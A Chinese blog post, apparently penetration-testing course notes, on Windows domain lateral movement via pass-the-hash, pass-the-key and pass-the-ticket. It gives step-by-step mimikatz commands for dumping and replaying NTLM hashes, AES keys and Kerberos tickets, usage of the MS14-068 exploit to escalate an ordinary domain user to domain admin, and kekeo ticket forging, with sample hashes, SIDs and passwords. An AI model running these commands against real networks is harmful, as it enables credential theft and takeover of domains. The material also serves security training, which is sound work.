首页 > 其他分享 >8.30域横向-PTH&PTK&PTT票据传递

8.30域横向-PTH&PTK&PTT票据传递

时间:2024-09-05 23:13:53浏览次数:10  
标签:PTK TGT PTH 068 ntlm 票据 8.30 连接

知识点

Kerberos协议具体工作方法,在域中:

客户机将明文密码进行NTLM哈希,然后和时间戳一起加密(使用krbtgt密码hash作为密钥),发送给kdc(域控),kdc对用户进行检测,成功之后创建TGT(Ticket-Granting Ticket)。

将TGT进行加密签名返回给客户机器,只有域用户krbtgt才能读取kerberos中TGT数据。

然后客户机将TGT发送给域控制器KDC请求TGS(票证授权服务)票证,并且对TGT进行检测。

检测成功之后,将目标服务账户的NTLM以及TGT进行加密,将加密后的结果返回给客户机。

PTH(pass the hash) :利用lm或ntlm值进行渗透测试
PTT(pass the ticket):利用票价凭证TGT进行渗透测试 (票据类比cookie)
PTK(pass the key):利用的ekeys ase256进行渗透测试

补丁信息通过“systeminfo”查看

PTH和PTK

PTH在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。

如果禁用了ntlm认证,PsExec无法利用获得的ntlm hash进行远程连接,但是使用mimikatz还是可以攻击成功。对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012等,可以使用AES keys代替NT hash来实现ptk攻击

总结:KB2871997补丁后的影响

pth:没打补丁用户都可以连接,打了补丁只能administrator连接

ptk:打了补丁才能用户都可以连接,采用aes256连接

https://www.freebuf.com/column/220740.html

PTT

PTT攻击的部分就不是简单的NTLM认证了,它是利用Kerberos协议进行攻击的,这里就介绍三种常见的攻击方法:MS14-068,Golden ticket,SILVER ticket,简单来说就是将连接合法的票据注入到内存中实现连接。

MS14-068基于漏洞,Golden ticket(黄金票据),SILVER ticket(白银票据)

其中Golden ticket(黄金票据),SILVER ticket(白银票据)属于权限维持技术

MS14-068造成的危害是允许域内任何一个普通用户,将自己提升至域管权限。微软给出的补丁是kb3011780 ;

域横向移动PTH传递-mimikatz

1、获取权限

privilege::debug

2、PTH ntlm传递

3、在未打补丁的工作组及域连接:

sekurlsa::pth /user:[用户名] /domain:[域名或“workgroup”] /ntlm:[ntlm的值]

sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7

成功会自动创建一个cmd,可以通过该cmd操作对应用户名的机器,如

4、查看C盘目录

dir \192.168.3.21\c$

5、IP地址不识别可以换成计算机名

注意:攻击时我们不知道IP、计算机名与用户名对应的情况,所以这是随即攻击,需要再测试看是哪个IP、计算机名对应的电脑被攻击了

“domain”的值为“workgroup”时,连接的是本地用户

域横向移动PTK传递-mimikatz

1、PTK aes256传递

打补丁后的工作组及域连接:

2、获取权限

privilege::debug

3、获取aes值

sekurlsa::ekeys

4、连接

sekurlsa::pth /user:[用户名] /domain:[域名或“workgroup”] /aes256:[aes256的值]

sekurlsa::pth /user:mary /domain:god /aes256:d7c1d9310753a2f7f240e5b2701dc1e……

域横向移动PTT传递-ms14068&kekeo&本地

第一种利用漏洞ms14-068

能实现普通用户直接获取域控system权限

MS14-068 powershell执行

1.查看当前sid

whoami /user

2.启动mimikatz,不需要提升权限,能用就行

清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造

kerberos::purge

查看当前机器凭证

kerberos::list

将票据注入到内存中

kerberos::ptc [票据文件]

3.利用ms14-068生成TGT数据

ms14-068.exe -u [域成员名]@[域名] -s [sid] -d [域控IP地址] -p [域成员密码]

MS14-068.exe -u [email protected] -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 - p admin!@#45

4.票据注入内存

kerberos::ptc [email protected]

5. 查看凭证列表

klist

6.利用

dir \192.168.3.21\c$

第二种利用工具kekeo

1.生成票据

.\kekeo "tgt::ask /user:[域成员名] /domain:[域名] /ntlm:[ntlm值]"

.\kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695d……"

2.导入票据

kerberos::ptt [票据文件]

kerberos::ptt [email protected][email protected]

3.查看凭证

klist

4.利用net use载入

dir \192.168.3.21\c$

第三种利用本地票据(需管理权限)

利用mimikatz收集本地票据,再将票据导入到内存中进行连接。有存活时间限制

privilege::debug

sekurlsa::tickets /export

kerberos::ptt [票据文件]

总结:ptt传递不需本地管理员权限,连接时主机名连接,基于漏洞、工具、本地票据

国产Ladon内网杀器测试验收

信息收集-协议扫描-漏洞探针-传递攻击等

“Wiki”界面有命令介绍

信息收集

GUI:“scan”界面选“scan”,“OnlinePC”界面右键选“OnlinePC”扫描

命令行:Ladon [网段] [关键词]

涉及资源:

Kerberos协议工作原理:https://blog.csdn.net/qq_32005671/article/details/54862678

KB22871997是否真的能防御PTH攻击?:https://www.freebuf.com/column/220740.html

Ladon:https://github.com/k8gege/Ladon

Ladon 9.1.1 & CobaltStrike神龙插件发布:http://k8gege.org/Ladon/cs911.html

kekeo:https://github.com/gentilkiwi/kekeo

WindowsExploits/MS14-068:https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

标签:PTK,TGT,PTH,068,ntlm,票据,8.30,连接
From: https://www.cnblogs.com/lusang/p/18399377

相关文章

  • Blender多角度深度图depth map渲染,MVCNN数据生成
    现在在网上已有开源代码来生成论文中推荐的Phong渲染多视图,代码解析如下:https://blog.csdn.net/jorg_zhao/article/details/88345324,代码链接大佬传在了github上:https://github.com/zeaggler/ModelNet_Blender_OFF2Multiview该代码包针对phong渲染提供了Blender配置文件,渲......
  • 8.30 ~ 9.8
    8.30返校日。又回到了原来的班(和化奥一个班),一个班有69个人;然后我坐在最角上......
  • 8.30 上午 becoder 模拟赛总结 & 题解
    T1密码当时想到解法了,却依然认为自己不会做,我真是个人才。结论:对于$\foralli\in[1,n)$,满足密码不是$a_i$的因数,且密码是$a_k$的因数,设满足条件的最小值为$g$则答案为$\frac{n}{g}$。一种最好想的做法:枚举$\gcd(a_k,n)$的因数作为$g$,并枚举$i\in[1,n)$,判断是......
  • 【一文看懂深度补全】Deep Depth Completion from Extremely Sparse Data: A Survey
    【综述】从稀疏的数据中进行深度补全:DeepDepthCompletionfromExtremelySparseData:ASurvey摘要1.引言贡献概述2.基于深度学习的深度补全2.1问题表述2.2分类方法3.无引导深度补全3.1稀疏感知CNN3.2归一化CNN3.3使用辅助图像进行......
  • C++:std::thread 和 pthread
            在C++中,线程的实现主要有两种方式:使用C++11标准库中的std::thread和POSIX线程库(pthread)。这两种方式各有优缺点,适用于不同的场景。以下是对这两种方式的详细比较和示例代码。std::thread示例代码#include<iostream>#include<thread>#include<chrono>......
  • 【秋招笔试】8.30饿了么秋招(算法岗)-三语言题解
    ......
  • 2024.8.30 总结(集训 考 DP)
    上午三个多小时考四道题的DP。赛时会的分:[100](?)+100+[30](?)+100。估分:100+100+0+100。实际分:10+100+0+100。挂巨量的分,挂了120分。下面是一些值得注意的点:T1就是分组背包。DP数组下标要考虑负数可以直接全体加一个值变成非负的,[或者用map之类的](?)(&不......
  • day59-graph theory-part09-8.30
    tasksfortoday:1.digkstra堆优化版47.参加科学大会2.bellman_ford算法94.城市间货物运输I---------------------------------------------------------------------------------1.dijkstra堆优化版Thisisanoptimizationforthevanilladijkstra,throughus......
  • 【深度补全最新综述】Deep Depth Completion from Extremely Sparse Data: A Survey
    【综述】从稀疏的数据中进行深度补全:DeepDepthCompletionfromExtremelySparseData:ASurvey从极度稀疏数据中完成深度的研究综述摘要1.引言贡献概述2.基于深度学习的深度补全2.1问题表述2.2分类方法3.无引导深度补全3.1稀疏感知CNN......
  • 线程:线程创建pthread_create,线程间的同步与互斥
    线程的创建 线程的创建是通过调用pthread_create函数来实现的。该函数的原型如下:intpthread_create(pthread_t*thread,constpthread_attr_t*attr,void*(*start_routine)(void*),void*arg);参数说明:thread:指向pthread_t类型的指针,用于存储新线程的ID。attr:指向......